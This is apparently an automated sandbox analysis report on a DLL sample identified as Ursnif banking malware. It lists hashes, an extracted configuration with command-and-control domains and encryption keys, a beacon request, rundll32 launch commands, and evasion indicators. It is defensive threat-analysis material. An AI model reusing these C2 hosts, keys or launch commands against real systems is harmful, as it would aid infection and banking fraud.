Analysis Report presentation.dll

ID:	404837
Product:	CloudBasic
Start time:	12:50:17
Start date:	05.05.2021
Sample:	presentation.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	9debcd929765390555ca123c0076eea4
SHA1:	d0c68d1d874a877dbbbce1fea0bb164c6bdad642
SHA256:	9969cfd81612d1efbc5e983b57ff2fa2a69a3f6a6812c6da8382bf0c22014cf4
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{93F744B1-ADDB-11EB-90E6-ECF4BB82F7E0}.dat	Microsoft Word Document	49F6B7EC57B2D00C8D6EB883B89F469B	71678F63F6820A1052EF0508BB36CCF1751D6B44	B46B55FABE8D834E48425FC723F5BBB14FBA93D05AE4882C33809D0087ED1E89
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{93F744B3-ADDB-11EB-90E6-ECF4BB82F7E0}.dat	Microsoft Word Document	18C6CB437E09C5DA3138CFE0C12FACF3	8EAA0C13469F0F244A0E65371025528D0E47BCF3	57276398DCB4EA94A93ACCB8E744E7F170359BFA81EE6774282F41625AC03170
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\ErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http_404[1]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	337C7ABD96ABBAE48D3334B09D918018	9D3673103FC0E9E29C10689E5D7A33EB8FE1292B	7429818A07E321667F900E52C0A74B786E744F233F33F16E60BC091DC5C9E0F3
C:\Users\user\AppData\Local\Temp\~DF615A7858A33FDD4B.TMP	data	F6A18585F58F28D0865FABEF22178F85	FCFAC439D675E64C4A8A654EF3DBBC25698E6927	56DE1E56B45194300E42201A5AB96792E73EDD6D4C6867EC9608D3888489162C
C:\Users\user\AppData\Local\Temp\~DFE183529A9C549E1C.TMP	data	EDFD47AA0AB0E70499337009970D93AD	12E92A6960D3FEAF2379B3EF2FE12834F3B5A339	581389B2E758E1D3D9A77D3605813C07E389F81C817DA00AB922E94CA29653BC

AV Detection:

Found malware configuration

Source: 5.3.rundll32.exe.3468d29.0.raw.unpack

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Compliance:

Uses 32bit PE files

Source: presentation.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: c:\Friend\507\123\Rol\well W\Flower.pdb source: presentation.dll

Networking:

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FUVq6FVw/212_2Fmya7wvf6qm5/W9P25GOkXEp_/2B7Ii5Reomx/DNGUxpOts5V_2F/m1ZCLgb0yZELhr1HDh2za/sK1pwrtT_2FYeJvy/UKI9xt8zwa55YYh/KZ8_2FX9rMmmJgeD_2/F8QbTyDtN/gF0rE8FYow3_2Fnp33aS/fsqd8_2FyHPS0_2Bp5_/2FbtiZGb31ZO5pN2ppiKul/1QXBqN9S9lxCI/vSq83RG3/yyRImlzN5vRP_2Bwx60Qoqa/1yNTVkSL_2Bp8is/j0c4aw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: app.buboleinov.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 May 2021 10:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

URLs found in memory or binary data

Source: {93F744B3-ADDB-11EB-90E6-ECF4BB82F7E0}.dat.21.dr, ~DF615A7858A33FDD4B.TMP.21.dr

String found in binary or memory: http://app.buboleinov.com/bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FU

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

System Summary:

Writes registry values via WMI

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642485 NtQueryVirtualMemory,		1_2_6D642485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6418D1 GetProcAddress,NtCreateSection,memset,		4_2_6D6418D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D641B89 NtMapViewOfSection,		4_2_6D641B89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642485 NtQueryVirtualMemory,		4_2_6D642485

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642264		1_2_6D642264
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D67FCA8		1_2_6D67FCA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D67495A		1_2_6D67495A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642264		4_2_6D642264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D67FCA8		4_2_6D67FCA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D67495A		4_2_6D67495A

Sample file is different than original file name gathered from version info

Source: presentation.dll

Binary or memory string: OriginalFilenameFlower.dll8 vs presentation.dll

Uses 32bit PE files

Source: presentation.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Classification label

Source: classification engine

Classification label: mal68.troj.winDLL@12/13@1/1

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{93F744B1-ADDB-11EB-90E6-ECF4BB82F7E0}.dat

Jump to behavior

Creates temporary files

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DFE183529A9C549E1C.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: presentation.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\presentation.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Might
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Might			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

PE file contains a debug data directory

Source: presentation.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:

Binary string: c:\Friend\507\123\Rol\well W\Flower.pdb source: presentation.dll

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D641F31 LoadLibraryA,GetProcAddress,

1_2_6D641F31

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642253 push ecx; ret		1_2_6D642263
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642200 push ecx; ret		1_2_6D642209
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D64FD65 push FFFFFF88h; ret		1_2_6D64FD71
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D651D31 push eax; iretd		1_2_6D651D5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D651C4E push ebx; iretd		1_2_6D651C4F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D650C3D push ds; iretd		1_2_6D650C49
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D650671 push esp; iretd		1_2_6D650689
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D65061E push esp; iretd		1_2_6D650689
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D6510C6 push ecx; ret		1_2_6D6510CE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D654B4C push 45C295E6h; retf		1_2_6D654B51
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D65534C push FFFFFFA4h; retf		1_2_6D65534F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D655B13 pushfd ; retf		1_2_6D655B75
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D6753C5 push ecx; ret		1_2_6D6753D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68F0C5 push cs; iretd		1_2_6D68F0CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68FB2F push ebp; iretd		1_2_6D68FB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642253 push ecx; ret		4_2_6D642263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642200 push ecx; ret		4_2_6D642209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D64FD65 push FFFFFF88h; ret		4_2_6D64FD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D651D31 push eax; iretd		4_2_6D651D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D651C4E push ebx; iretd		4_2_6D651C4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D650C3D push ds; iretd		4_2_6D650C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65649F push ecx; retf		4_2_6D656509
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D650671 push esp; iretd		4_2_6D650689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65061E push esp; iretd		4_2_6D650689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D656101 push eax; ret		4_2_6D656108
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65700C push es; iretd		4_2_6D657012
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6510C6 push ecx; ret		4_2_6D6510CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D654B4C push 45C295E6h; retf		4_2_6D654B51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65534C push FFFFFFA4h; retf		4_2_6D65534F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D655B13 pushfd ; retf		4_2_6D655B75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6753C5 push ecx; ret		4_2_6D6753D8

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

Disables application error messsages (SetErrorMode)

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D641F31 LoadLibraryA,GetProcAddress,

1_2_6D641F31

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68D1A5 mov eax, dword ptr fs:[00000030h]		1_2_6D68D1A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68CCE2 push dword ptr fs:[00000030h]		1_2_6D68CCE2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68D0DB mov eax, dword ptr fs:[00000030h]		1_2_6D68D0DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68D1A5 mov eax, dword ptr fs:[00000030h]		4_2_6D68D1A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68CCE2 push dword ptr fs:[00000030h]		4_2_6D68CCE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68D0DB mov eax, dword ptr fs:[00000030h]		4_2_6D68D0DB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1

Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		1_2_6D641566
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		1_2_6D67BDC3
